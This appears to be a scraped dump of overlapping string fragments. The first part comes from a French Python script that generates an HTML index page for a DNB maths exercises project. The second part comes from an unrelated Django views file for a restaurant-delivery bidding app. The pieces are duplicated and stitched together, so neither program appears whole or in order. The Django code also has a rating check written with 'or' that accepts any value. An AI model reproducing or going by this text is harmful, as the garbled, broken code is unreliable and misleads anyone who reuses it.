"class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf",
"<a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body indexHTML.writelines([ \"\"\" </body>\\n",
"python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live",
"\"\"\" Fonction principale qui sera appelée pour générer l'ensemble des pages HTML. \"\"\"",
"tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p>",
"HTML. \"\"\" pass # On fait les imports nécessaires selon le contexte #",
"à récupérer tous les exercices des sujets DNB en partage sur le site",
"not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier html qui va",
"le dossier qui va accueillir les fichiers HTML si il n'existe pas if",
"in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les",
"href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier",
"crée le dossier qui va accueillir les fichiers HTML si il n'existe pas",
"# On fait les imports nécessaires selon le contexte # Pour pouvoir créer",
"barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie",
"et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes",
"<b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un",
"href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a>",
"dossier qui va accueillir les fichiers HTML si il n'existe pas if not",
"pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir",
"ici pour y mettre les fichiers HTML import os # On fait les",
"\"\"\" Génère une page HTML. \"\"\" pass # On fait les imports nécessaires",
"spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous les exercices",
"contexte # Pour générer les fichiers HTML if __name__ == \"__main__\": from HTML_constantes",
"cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex",
"le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et le",
"import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction",
"sujet de polynésie 2020<br><br> Pour générer la documentation il faut installer le paquet",
"zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li>",
"créer un répertoire, ici pour y mettre les fichiers HTML import os #",
"dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes </h3> <p> Les fichiers",
"pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\"",
"mettre les fichiers HTML import os # On fait les imports nécessaires selon",
"en écriture le fichier html qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\",",
"<NAME> \"\"\" Génère une page HTML. \"\"\" pass # On fait les imports",
"utf8 -*- # @author : <NAME> \"\"\" Génère une page HTML. \"\"\" pass",
"accueillir les fichiers HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") #",
"moment le test se fait sur le premier exo du sujet de polynésie",
"HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers",
"doctype et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le",
"</h3> <p> Les fichiers de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br>",
"<p>La procédure a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\">",
"n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier",
"Le projet consiste à récupérer tous les exercices des sujets DNB en partage",
"il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le",
"elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute",
"png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a",
"du sujet de polynésie 2020<br><br> Pour générer la documentation il faut installer le",
"Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui sera appelée",
"On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le",
"les imports nécessaires selon le contexte # Pour pouvoir créer un répertoire, ici",
"else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def",
"On crée le dossier qui va accueillir les fichiers HTML si il n'existe",
"procédure a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive",
"Pour le moment le test se fait sur le premier exo du sujet",
"dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes </h3> <p>",
"générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a",
"indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de",
"body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la barre de navigation for",
"<h3> Notes </h3> <p> Les fichiers de la documentations sont générés dans le",
"class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le",
"le site de l'APMEP<br> Pour le moment le test se fait sur le",
"le fichier source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ])",
"un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex",
"# @author : <NAME> \"\"\" Génère une page HTML. \"\"\" pass # On",
"#!/usr/bin/python3 #-*- coding: utf8 -*- # @author : <NAME> \"\"\" Génère une page",
"pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\"",
"paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation",
"<ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au",
"# On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la",
"il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p>",
"head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) #",
"class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers",
"de polynésie 2020<br><br> Pour générer la documentation il faut installer le paquet python",
"<b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes </h3> <p> Les fichiers de",
"du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server et aller dans le",
"projet consiste à récupérer tous les exercices des sujets DNB en partage sur",
"partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous les",
"<p> Les fichiers de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les",
"dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\"",
"les exercices des sujets DNB en partage sur le site de l'APMEP<br> Pour",
"<li>Sous <b>Visual Studio Code</b> lancer Live server et aller dans le dossier <b>PagesWeb</b>"
] |
[
"order.save() rating = order.delivery_rating return render(request, 'deliverer/order.html', context={ 'order': order, 'customerAddress': customer_address, 'restaurantAddress':",
"None # makes sure user is deliverer try: my_user = request.user userIs =",
"== 'H' if registered: return redirect('deliverer-home') registering = my_deliverer.restaurant == None and my_deliverer.status",
"import render, redirect, get_list_or_404, get_object_or_404 from database.models import user, restaurant, address from helper",
"= redirect('home-nexus') return response except: response = redirect('home-nexus') return response my_deliverer = user.Deliverer.objects.get(user=my_user)",
"if isType(user.Deliverer) != True: response = redirect('home-nexus') return response except: response = redirect('home-nexus')",
"order = get_object_or_404(restaurant.Order, pk=pk) customer = order.customer customer_address = address.CustomerAddress.objects.get(customer=customer) my_resturant = user.Deliverer.objects.get(user=my_user).restaurant",
"= order.customer customer_address = address.CustomerAddress.objects.get(customer=customer) my_resturant = user.Deliverer.objects.get(user=my_user).restaurant restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method ==",
"registering} if request.method == \"POST\": body = parse_req_body(request.body) resturant_id = int(body['id']) reg_resturant =",
"'H' restaurants = restaurant.Restaurant.objects.all() context={'restaurants': restaurants, 'registering': registering} if request.method == \"POST\": body",
"address.CustomerAddress.objects.get(customer=customer) my_resturant = user.Deliverer.objects.get(user=my_user).restaurant restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method == \"POST\"): body = parse_req_body(request.body)",
"restaurant=my_resturant, status='N') customer_status.save() customer_status.update_status(rating) order.save() rating = order.delivery_rating return render(request, 'deliverer/order.html', context={ 'order':",
"print(e) response = redirect('home-nexus') return response except: response = redirect('home-nexus') return response my_deliverer",
"context['registering'] = False return render(request, 'deliverer/register.html', context=context) def order(request, pk): my_user = request.user",
"pk): my_user = request.user order = get_object_or_404(restaurant.Order, pk=pk) customer = order.customer customer_address =",
"from helper import parse_req_body, userTypeChecker import django.views # Create your views here. def",
"and my_deliverer.status == 'H' if registered: return redirect('deliverer-home') registering = my_deliverer.restaurant == None",
"userTypeChecker import django.views # Create your views here. def home(request): my_user = None",
"amount = body['amount'] order_id = body['orderId'] order = restaurant.Order.objects.get(id=order_id) new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False,",
"restaurants, 'registering': registering} if request.method == \"POST\": body = parse_req_body(request.body) resturant_id = int(body['id'])",
"user.Deliverer.objects.get(user=my_user).restaurant restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method == \"POST\"): body = parse_req_body(request.body) rating = int(body['rating'])",
"reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant = reg_resturant my_deliverer.save() context['registering'] = False return render(request, 'deliverer/register.html',",
"0: open_orders.append(order) print(open_orders) print(pending_bids) print(won_bids) context = { 'warnings': my_deliverer.warnings, 'openOrders': open_orders, 'pendingBids':",
"def home(request): my_user = None # makes sure user is deliverer try: my_user",
"is deliverer try: my_user = request.user userIs = userTypeChecker(my_user) if userIs(user.Deliverer) != True:",
"= reg_resturant my_deliverer.save() context['registering'] = False return render(request, 'deliverer/register.html', context=context) def order(request, pk):",
"my_deliverer.warnings, 'openOrders': open_orders, 'pendingBids': pending_bids, 'winningBids': won_bids } return render(request, 'deliverer/home.html', context=context) def",
"restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant = reg_resturant my_deliverer.save() context['registering'] = False return render(request, 'deliverer/register.html', context=context) def",
"= redirect('home-nexus') return response my_deliverer = user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and",
"render(request, 'deliverer/register.html', context=context) def order(request, pk): my_user = request.user order = get_object_or_404(restaurant.Order, pk=pk)",
"redirect('home-nexus') return response my_deliverer = user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status",
"request.user order = get_object_or_404(restaurant.Order, pk=pk) customer = order.customer customer_address = address.CustomerAddress.objects.get(customer=customer) my_resturant =",
"return response except Exception as e: print(e) response = redirect('home-nexus') return response except:",
"'openOrders': open_orders, 'pendingBids': pending_bids, 'winningBids': won_bids } return render(request, 'deliverer/home.html', context=context) def register(request):",
"pk=pk) customer = order.customer customer_address = address.CustomerAddress.objects.get(customer=customer) my_resturant = user.Deliverer.objects.get(user=my_user).restaurant restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant)",
"<= 5: order.status = 'D' order.customer_rating = rating try: customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant)",
"len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H' if registered: return redirect('deliverer-home') registering =",
"0 and my_deliverer.status == 'H' if registered: return redirect('deliverer-home') registering = my_deliverer.restaurant ==",
"= user.Deliverer.objects.get(user=my_user).restaurant restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method == \"POST\"): body = parse_req_body(request.body) rating =",
"Create your views here. def home(request): my_user = None # makes sure user",
"return response except: response = redirect('home-nexus') return response my_deliverer = user.Deliverer.objects.get(user=my_user) registered =",
"order(request, pk): my_user = request.user order = get_object_or_404(restaurant.Order, pk=pk) customer = order.customer customer_address",
"True: response = redirect('home-nexus') return response except Exception as e: print(e) response =",
"user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H' if registered !=",
"redirect('deliverer-register') if request.method == \"POST\": # If bidded body = parse_req_body(request.body) amount =",
"= body['amount'] order_id = body['orderId'] order = restaurant.Order.objects.get(id=order_id) new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount,",
"def register(request): my_user = None try: my_user = request.user isType = userTypeChecker(my_user) if",
"registering = my_deliverer.restaurant == None and my_deliverer.status != 'H' restaurants = restaurant.Restaurant.objects.all() context={'restaurants':",
"customer_status.save() customer_status.update_status(rating) order.save() rating = order.delivery_rating return render(request, 'deliverer/order.html', context={ 'order': order, 'customerAddress':",
"order.customer_rating = rating try: customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant) except: customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant,",
"!= 'H' restaurants = restaurant.Restaurant.objects.all() context={'restaurants': restaurants, 'registering': registering} if request.method == \"POST\":",
"request.user userIs = userTypeChecker(my_user) if userIs(user.Deliverer) != True: response = redirect('home-nexus') return response",
"= userTypeChecker(my_user) if isType(user.Deliverer) != True: response = redirect('home-nexus') return response except: response",
"registered: return redirect('deliverer-home') registering = my_deliverer.restaurant == None and my_deliverer.status != 'H' restaurants",
"try: customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant) except: customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N') customer_status.save() customer_status.update_status(rating)",
"'warnings': my_deliverer.warnings, 'openOrders': open_orders, 'pendingBids': pending_bids, 'winningBids': won_bids } return render(request, 'deliverer/home.html', context=context)",
"!= True: response = redirect('home-nexus') return response except: response = redirect('home-nexus') return response",
"as e: print(e) response = redirect('home-nexus') return response except: response = redirect('home-nexus') return",
"= None try: my_user = request.user isType = userTypeChecker(my_user) if isType(user.Deliverer) != True:",
"= my_deliverer.restaurant) pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders = [] for order",
"my_user = None try: my_user = request.user isType = userTypeChecker(my_user) if isType(user.Deliverer) !=",
"parse_req_body, userTypeChecker import django.views # Create your views here. def home(request): my_user =",
"restaurant, address from helper import parse_req_body, userTypeChecker import django.views # Create your views",
"import user, restaurant, address from helper import parse_req_body, userTypeChecker import django.views # Create",
"= parse_req_body(request.body) rating = int(body['rating']) if 0 <= rating or rating <= 5:",
"database.models import user, restaurant, address from helper import parse_req_body, userTypeChecker import django.views #",
"0 <= rating or rating <= 5: order.status = 'D' order.customer_rating = rating",
"context={'restaurants': restaurants, 'registering': registering} if request.method == \"POST\": body = parse_req_body(request.body) resturant_id =",
"new_bid.save() unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant) pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders",
"[] for order in unchosen_orders: if len(pending_bids.filter(order=order)) == 0: open_orders.append(order) print(open_orders) print(pending_bids) print(won_bids)",
"in unchosen_orders: if len(pending_bids.filter(order=order)) == 0: open_orders.append(order) print(open_orders) print(pending_bids) print(won_bids) context = {",
"response = redirect('home-nexus') return response except Exception as e: print(e) response = redirect('home-nexus')",
"unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant) pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders =",
"'pendingBids': pending_bids, 'winningBids': won_bids } return render(request, 'deliverer/home.html', context=context) def register(request): my_user =",
"= userTypeChecker(my_user) if userIs(user.Deliverer) != True: response = redirect('home-nexus') return response except Exception",
"'winningBids': won_bids } return render(request, 'deliverer/home.html', context=context) def register(request): my_user = None try:",
"= int(body['id']) reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant = reg_resturant my_deliverer.save() context['registering'] = False return",
"request.user isType = userTypeChecker(my_user) if isType(user.Deliverer) != True: response = redirect('home-nexus') return response",
"= len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H' if registered: return redirect('deliverer-home') registering",
"reg_resturant my_deliverer.save() context['registering'] = False return render(request, 'deliverer/register.html', context=context) def order(request, pk): my_user",
"= False return render(request, 'deliverer/register.html', context=context) def order(request, pk): my_user = request.user order",
"def order(request, pk): my_user = request.user order = get_object_or_404(restaurant.Order, pk=pk) customer = order.customer",
"return response my_deliverer = user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status ==",
"if len(pending_bids.filter(order=order)) == 0: open_orders.append(order) print(open_orders) print(pending_bids) print(won_bids) context = { 'warnings': my_deliverer.warnings,",
"redirect('home-nexus') return response except: response = redirect('home-nexus') return response my_deliverer = user.Deliverer.objects.get(user=my_user) registered",
"== None and my_deliverer.status != 'H' restaurants = restaurant.Restaurant.objects.all() context={'restaurants': restaurants, 'registering': registering}",
"registered return redirect('deliverer-register') if request.method == \"POST\": # If bidded body = parse_req_body(request.body)",
"isType = userTypeChecker(my_user) if isType(user.Deliverer) != True: response = redirect('home-nexus') return response except:",
"return render(request, 'deliverer/register.html', context=context) def order(request, pk): my_user = request.user order = get_object_or_404(restaurant.Order,",
"= request.user order = get_object_or_404(restaurant.Order, pk=pk) customer = order.customer customer_address = address.CustomerAddress.objects.get(customer=customer) my_resturant",
"from django.shortcuts import render, redirect, get_list_or_404, get_object_or_404 from database.models import user, restaurant, address",
"return redirect('deliverer-register') if request.method == \"POST\": # If bidded body = parse_req_body(request.body) amount",
"restaurant.Restaurant.objects.all() context={'restaurants': restaurants, 'registering': registering} if request.method == \"POST\": body = parse_req_body(request.body) resturant_id",
"registered != True: # if not registered return redirect('deliverer-register') if request.method == \"POST\":",
"= parse_req_body(request.body) amount = body['amount'] order_id = body['orderId'] order = restaurant.Order.objects.get(id=order_id) new_bid =",
"= 'D' order.customer_rating = rating try: customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant) except: customer_status =",
"won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders = [] for order in unchosen_orders: if len(pending_bids.filter(order=order)) ==",
"if(request.method == \"POST\"): body = parse_req_body(request.body) rating = int(body['rating']) if 0 <= rating",
"order_id = body['orderId'] order = restaurant.Order.objects.get(id=order_id) new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order) new_bid.save()",
"sure user is deliverer try: my_user = request.user userIs = userTypeChecker(my_user) if userIs(user.Deliverer)",
"address from helper import parse_req_body, userTypeChecker import django.views # Create your views here.",
"my_deliverer.status == 'H' if registered != True: # if not registered return redirect('deliverer-register')",
"customer_status = restaurant.CustomerStatus(customer=customer, restaurant=my_resturant, status='N') customer_status.save() customer_status.update_status(rating) order.save() rating = order.delivery_rating return render(request,",
"won_bids } return render(request, 'deliverer/home.html', context=context) def register(request): my_user = None try: my_user",
"restaurants = restaurant.Restaurant.objects.all() context={'restaurants': restaurants, 'registering': registering} if request.method == \"POST\": body =",
"your views here. def home(request): my_user = None # makes sure user is",
"body = parse_req_body(request.body) amount = body['amount'] order_id = body['orderId'] order = restaurant.Order.objects.get(id=order_id) new_bid",
"my_deliverer.restaurant) pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders = [] for order in",
"= [] for order in unchosen_orders: if len(pending_bids.filter(order=order)) == 0: open_orders.append(order) print(open_orders) print(pending_bids)",
"'D' order.customer_rating = rating try: customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant) except: customer_status = restaurant.CustomerStatus(customer=customer,",
"= restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders = [] for order in unchosen_orders: if len(pending_bids.filter(order=order)) == 0:",
"import django.views # Create your views here. def home(request): my_user = None #",
"# Create your views here. def home(request): my_user = None # makes sure",
"# makes sure user is deliverer try: my_user = request.user userIs = userTypeChecker(my_user)",
"= restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant) pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders = []",
"request.method == \"POST\": body = parse_req_body(request.body) resturant_id = int(body['id']) reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant",
"and my_deliverer.status == 'H' if registered != True: # if not registered return",
"context = { 'warnings': my_deliverer.warnings, 'openOrders': open_orders, 'pendingBids': pending_bids, 'winningBids': won_bids } return",
"open_orders, 'pendingBids': pending_bids, 'winningBids': won_bids } return render(request, 'deliverer/home.html', context=context) def register(request): my_user",
"response except Exception as e: print(e) response = redirect('home-nexus') return response except: response",
"None try: my_user = request.user isType = userTypeChecker(my_user) if isType(user.Deliverer) != True: response",
"try: my_user = request.user isType = userTypeChecker(my_user) if isType(user.Deliverer) != True: response =",
"my_deliverer = user.Deliverer.objects.get(user=my_user) registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H' if",
"my_user = request.user isType = userTypeChecker(my_user) if isType(user.Deliverer) != True: response = redirect('home-nexus')",
"None and my_deliverer.status != 'H' restaurants = restaurant.Restaurant.objects.all() context={'restaurants': restaurants, 'registering': registering} if",
"my_deliverer.status != 'H' restaurants = restaurant.Restaurant.objects.all() context={'restaurants': restaurants, 'registering': registering} if request.method ==",
"django.views # Create your views here. def home(request): my_user = None # makes",
"If bidded body = parse_req_body(request.body) amount = body['amount'] order_id = body['orderId'] order =",
"\"POST\"): body = parse_req_body(request.body) rating = int(body['rating']) if 0 <= rating or rating",
"my_deliverer.restaurant == None and my_deliverer.status != 'H' restaurants = restaurant.Restaurant.objects.all() context={'restaurants': restaurants, 'registering':",
"here. def home(request): my_user = None # makes sure user is deliverer try:",
"user is deliverer try: my_user = request.user userIs = userTypeChecker(my_user) if userIs(user.Deliverer) !=",
"= address.CustomerAddress.objects.get(customer=customer) my_resturant = user.Deliverer.objects.get(user=my_user).restaurant restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method == \"POST\"): body =",
"restaurant.Order.objects.get(id=order_id) new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order) new_bid.save() unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant)",
"= parse_req_body(request.body) resturant_id = int(body['id']) reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant = reg_resturant my_deliverer.save() context['registering']",
"price=amount, order=order) new_bid.save() unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant) pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids =",
"= restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant = reg_resturant my_deliverer.save() context['registering'] = False return render(request, 'deliverer/register.html', context=context)",
"customer_address = address.CustomerAddress.objects.get(customer=customer) my_resturant = user.Deliverer.objects.get(user=my_user).restaurant restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method == \"POST\"): body",
"bidded body = parse_req_body(request.body) amount = body['amount'] order_id = body['orderId'] order = restaurant.Order.objects.get(id=order_id)",
"restaurant_address = address.RestaurantAddress.objects.get(restaurant=my_resturant) if(request.method == \"POST\"): body = parse_req_body(request.body) rating = int(body['rating']) if",
"<= rating or rating <= 5: order.status = 'D' order.customer_rating = rating try:",
"restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant) pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=True) open_orders = [] for",
"{ 'warnings': my_deliverer.warnings, 'openOrders': open_orders, 'pendingBids': pending_bids, 'winningBids': won_bids } return render(request, 'deliverer/home.html',",
"order.status = 'D' order.customer_rating = rating try: customer_status = restaurant.CustomerStatus.objects.get(customer=customer, restaurant=my_resturant) except: customer_status",
"> 0 and my_deliverer.status == 'H' if registered != True: # if not",
"user, restaurant, address from helper import parse_req_body, userTypeChecker import django.views # Create your",
"print(open_orders) print(pending_bids) print(won_bids) context = { 'warnings': my_deliverer.warnings, 'openOrders': open_orders, 'pendingBids': pending_bids, 'winningBids':",
"registered = len(user.Deliverer.objects.filter(user=my_user).exclude(restaurant__isnull=True)) > 0 and my_deliverer.status == 'H' if registered != True:",
"== 'H' if registered != True: # if not registered return redirect('deliverer-register') if",
"render(request, 'deliverer/home.html', context=context) def register(request): my_user = None try: my_user = request.user isType",
"e: print(e) response = redirect('home-nexus') return response except: response = redirect('home-nexus') return response",
"win=False, price=amount, order=order) new_bid.save() unchosen_orders = restaurant.Order.objects.filter(chose_bid=False).filter(restaurant = my_deliverer.restaurant) pending_bids = restaurant.DeliveryBid.objects.filter(deliverer=my_deliverer).filter(win=False) won_bids",
"int(body['id']) reg_resturant = restaurant.Restaurant.objects.get(id=resturant_id) my_deliverer.restaurant = reg_resturant my_deliverer.save() context['registering'] = False return render(request,",
"'deliverer/register.html', context=context) def order(request, pk): my_user = request.user order = get_object_or_404(restaurant.Order, pk=pk) customer",
"# If bidded body = parse_req_body(request.body) amount = body['amount'] order_id = body['orderId'] order",
"return render(request, 'deliverer/home.html', context=context) def register(request): my_user = None try: my_user = request.user",
"0 and my_deliverer.status == 'H' if registered != True: # if not registered",
"if request.method == \"POST\": # If bidded body = parse_req_body(request.body) amount = body['amount']",
"= request.user userIs = userTypeChecker(my_user) if userIs(user.Deliverer) != True: response = redirect('home-nexus') return",
"> 0 and my_deliverer.status == 'H' if registered: return redirect('deliverer-home') registering = my_deliverer.restaurant",
"views here. def home(request): my_user = None # makes sure user is deliverer",
"if registered: return redirect('deliverer-home') registering = my_deliverer.restaurant == None and my_deliverer.status != 'H'",
"rating or rating <= 5: order.status = 'D' order.customer_rating = rating try: customer_status",
"body['orderId'] order = restaurant.Order.objects.get(id=order_id) new_bid = restaurant.DeliveryBid(deliverer=my_deliverer, win=False, price=amount, order=order) new_bid.save() unchosen_orders =",
